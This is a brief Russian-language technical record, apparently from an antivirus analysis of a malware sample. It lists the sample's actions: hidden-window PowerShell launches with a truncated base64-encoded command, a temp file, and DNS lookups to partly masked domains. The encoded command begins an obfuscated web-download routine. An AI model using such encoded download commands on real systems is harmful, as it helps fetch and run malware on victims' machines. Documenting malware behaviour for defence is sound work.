Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAG8AbwBjAFoAWAA9ACgAJwBrAEEAeAAnACsAJwBDADEAawBRACcAKQA7ACQARgAxAEIAVQBRAEQAUQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQBvAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\802734.cvr
- DNS ASK ba####onsulting.com
- DNS ASK bi#####itimonline.com
- DNS ASK au##.xyz
- DNS ASK al####andyork.com
- DNS ASK ab####eative.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAG8AbwBjAFoAWAA9ACgAJwBrAEEAeAAnACsAJwBDADEAawBRACcAKQA7ACQARgAxAEIAVQBRAEQAUQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQBvAE...' (со скрытым окном)